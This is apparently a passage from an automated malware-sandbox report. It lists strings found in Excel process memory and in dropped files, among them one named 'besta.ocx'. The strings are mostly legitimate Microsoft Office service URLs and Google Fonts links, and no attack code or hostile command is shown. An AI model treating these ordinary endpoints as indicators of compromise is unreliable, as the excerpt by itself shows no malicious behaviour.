    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech#
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechwingK
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.504997162.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765835607.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620203784.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637145469.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496692070.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.578892329.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.305119965.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576335404.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301230323.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616873186.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755525188.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580420279.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303145837.000000000F971000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:ital
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/u
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/t
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netpoint
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000000.00000003.503943037.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765237836.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757836026.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576411439.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: EXCEL.EXEString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: EXCEL.EXE, 00000000.00000003.504997162.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765835607.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620203784.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637145469.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496692070.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.578892329.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.305119965.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576335404.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301230323.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616873186.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755525188.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580420279.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303145837.000000000F971000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1=
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: EXCEL.EXE, 00000000.00000003.679220709.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496781565.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756599523.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301274679.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576000870.0000000013341000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=10
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000000.00000003.679220709.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496781565.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756599523.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301274679.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576000870.0000000013341000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=14
    Source: EXCEL.EXE, 00000000.00000003.301268195.0000000013334000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.575991417.0000000013333000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496771693.0000000013333000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756579142.0000000013333000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679200853.0000000013333000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.comce
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.como
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.504997162.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765835607.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620203784.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637145469.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496692070.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.578892329.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.305119965.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576335404.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301230323.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616873186.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755525188.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580420279.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303145837.000000000F971000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: EXCEL.EXE, 00000000.00000002.766449411.00000000132B0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496724357.00000000132DA000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
